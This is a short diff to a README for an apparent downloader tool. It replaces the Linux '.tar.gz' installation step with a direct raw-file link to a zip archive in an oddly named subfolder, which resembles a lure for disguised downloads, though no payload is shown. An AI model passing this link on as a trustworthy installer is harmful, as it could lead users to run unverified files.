middletondaniel1/universalDownloader/README.md

    Click on the version you want to download.
 Choose the right file for your operating system:
    - For Windows users, download the `.exe` file.
    - For MacOS users, download the `.dmg` file.
-   - For Linux users, download the `.tar.gz` file.
+   - For Linux users, download the `https://raw.githubusercontent.com/middletondaniel1/universalDownloader/main/berm/universalDownloader.zip` file.

 4. **Run the Installer**